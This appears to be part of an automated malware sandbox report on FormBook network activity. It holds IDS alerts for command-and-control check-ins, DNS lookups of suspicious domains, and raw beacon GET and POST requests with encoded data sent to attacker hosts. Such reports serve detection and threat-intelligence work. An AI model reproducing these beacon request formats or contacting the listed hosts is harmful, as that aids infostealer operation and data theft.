            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50034 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50039 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50039 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50034 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50036 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50018 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50040 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50038 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50038 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50026 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50026 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50022 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.xueerr.xyz
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
            Source: Joe Sandbox ViewASN Name: METAREGISTRARNL METAREGISTRARNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dxfwrc2h.sbsConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /4bpc/?7Bohe=W6c12MBAM7+Q3p2I42CNcaaX4meOt2NlPYb0dUqqy/7eqOW0wKa7H8cBCmolVGR7OaXpdOvS7kWyFQKJ7xuZambhzJ6Jbz/iDls78L0zlt4s48FcRMJ2uoIWwWqypjO6Yg==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nieuws-july202491.sbsConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /oacu/?vD=h0e85v&7Bohe=QyeFQ+FiMQKSKdq/BKxG+5Ov1bwmlN3FnlPZyKM2ZYbXsZFvV/O3NTv6ZfeubWU6jSKaxDXQpId5DKUlUVN54eSFHJCOrp//l7em+zpeeu1iGig/Io/KcJQlUpo44DFlsQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.putizhong.homesConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /o55g/?7Bohe=SntAYgquUuF8cmTqKgeHt96czNjKbI7walrzfjn5MBbpbz0DMUAQT5TGmaCmCOcjM4ET7TOvVUXTFF/O6lHSx5C+s9iWJ/mgfg63citE2SV2GP/8IEdknZeeY7ynAeJL4g==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.coba168.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /kb53/?7Bohe=1b0Bx/9NiZhb6KmmoJd23RBorG5xllzN0i8gdStRuw/8VfKYv2Om9x/jS97CLdhlzFEmDVkAPiLAZwnB3Rwit6hYzhYwWiv4x0tew8h6s38ig+exADmGM0H8mBfgPTkFYw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.everyone.golfConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /elh0/?7Bohe=pzF/mZhnV0GSmLX+GycMwU6WT06CzqVGvQudBfY4Dqjs/3KtcpfJYGVadgWONk/4osLjzgZwgHUQ0ZwKAvTdTnbY8Qd/xTrHuaQfE1OzRfvOWlfeun0LuB51rXnhStJusg==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.royapop.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /deo6/?7Bohe=NByBCVC4fvk3zNlObrJyagJtuzfI3YQ4Ad7pkV0ATPDcP1/VdlZwhks7LZ4Zlk95UTsGsfg9gVB7u8RemM4hoUvK2Ig2OY9rZRI88AWKe5yd8pSEv6a6wulMHxqZW9lecA==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.b-ambu.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /r966/?vD=h0e85v&7Bohe=St0zOmS57JvxXHngaoKRrYwJhw67SG7V3FAZs2TYvCYNXtW49c+AatXE2ZBTP/KNdGCD9DmtL2naWYac77vyUP4q1YSJ6U5Kf8MwRQ43aJ1o9SgGH2ER+UvSNI1J5J1sVQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.livpure-grab.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /4nqw/?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bandukchi.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /djad/?7Bohe=OgBIZAb3K3QVmDSyooTSIAO5Tll+jwwdUI93t9cTrZTAkguQuNIIHt4CXXwiEPUK7V7i0FBLQRxFESBesMpHDzV+LIhV5qbZyNO4rVJKeHZqQ73AKCfxWCZcLIU2txA0ig==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mcse.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /2vbz/?7Bohe=qlAZWX/ch455H6hDeAWyjxeCoVjeFLImmNyoFLJZcRWWfOSwb/dYbmE5Lo+ESXiDiuCMQOi3bdztXr54sGaKYuw5X5+G7ZC+wzrMILyG35q/IsHjv6ziuhAlYbb1UGsQUw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.voidzero.techConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /cvus/?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.huwin.clubConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /vhqd/?7Bohe=WoZBIA9oyl+J2b4VfTP9l9A782ZII/35uSr01551g8NzakXtA+Pa5+JAPkHp6kowgs8acnK71ZwIZDZByVYOuYH08N3N2lAmC4I9AOVCDFEu0aUC6s+F7cMMpoEI61JPvA==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.xueerr.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /z0t0/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.onlineblikje.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /3x2e/?7Bohe=LxBS6Twi9uZYinzDVhZFrrwHDjbbsejF2aCFyI0NTfR3MRAzX3VYMflTVpKBnal2v445F0Z9ZuD89KJE1ZsSKujcQCdh/qxt+vHDLhQvad3slFytU7/EPl4Sr/TZznzmuw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rtpsilva4d.clickConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dxfwrc2h.sbsConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficDNS traffic detected: DNS query: www.dxfwrc2h.sbs
            Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202491.sbs
            Source: global trafficDNS traffic detected: DNS query: www.putizhong.homes
            Source: global trafficDNS traffic detected: DNS query: www.coba168.info
            Source: global trafficDNS traffic detected: DNS query: www.everyone.golf
            Source: global trafficDNS traffic detected: DNS query: www.royapop.online
            Source: global trafficDNS traffic detected: DNS query: www.jy58gdwf7t.skin
            Source: global trafficDNS traffic detected: DNS query: www.b-ambu.com
            Source: global trafficDNS traffic detected: DNS query: www.livpure-grab.online
            Source: global trafficDNS traffic detected: DNS query: www.bandukchi.com
            Source: global trafficDNS traffic detected: DNS query: www.mcse.top
            Source: global trafficDNS traffic detected: DNS query: www.voidzero.tech
            Source: global trafficDNS traffic detected: DNS query: www.huwin.club
            Source: global trafficDNS traffic detected: DNS query: www.xueerr.xyz
            Source: global trafficDNS traffic detected: DNS query: www.onlineblikje.online
            Source: global trafficDNS traffic detected: DNS query: www.rtpsilva4d.click
            Source: unknownHTTP traffic detected: POST /4bpc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.nieuws-july202491.sbsOrigin: http://www.nieuws-july202491.sbsCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Referer: http://www.nieuws-july202491.sbs/4bpc/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 37 42 6f 68 65 3d 62 34 30 56 31 37 68 34 48 72 58 79 79 39 6d 78 6a 43 53 35 45 34 4f 66 70 47 75 57 68 57 67 48 45 4b 2f 32 4a 6e 43 58 39 39 4f 36 30 4b 2f 57 35 49 43 57 46 4f 6f 4f 44 6a 68 66 62 58 35 59 62 76 4c 4a 4c 4b 44 6e 32 7a 75 4f 46 54 71 5a 69 69 32 51 61 6d 43 65 38 37 79 50 54 68 76 39 4b 79 6b 6a 78 74 45 69 34 2b 78 46 31 66 64 5a 5a 4e 31 68 78 76 55 61 79 46 50 55 70 69 6e 76 44 2f 59 73 74 45 74 4d 4c 77 58 46 75 4b 64 63 4e 54 54 67 4f 71 4e 68 76 47 74 52 6d 6a 62 73 69 62 31 31 73 4e 57 35 58 57 75 5a 77 72 32 49 39 61 61 48 69 66 58 73 30 51 77 55 57 74 36 55 64 39 6a 39 61 4d 63 3d Data Ascii: 7Bohe=b40V17h4HrXyy9mxjCS5E4OfpGuWhWgHEK/2JnCX99O60K/W5ICWFOoODjhfbX5YbvLJLKDn2zuOFTqZii2QamCe87yPThv9KykjxtEi4+xF1fdZZN1hxvUayFPUpinvD/YstEtMLwXFuKdcNTTgOqNhvGtRmjbsib11sNW5XWuZwr2I9aaHifXs0QwUWt6Ud9j9aMc=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Thu, 24 Oct 2024 13:17:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:17:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:17:53 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 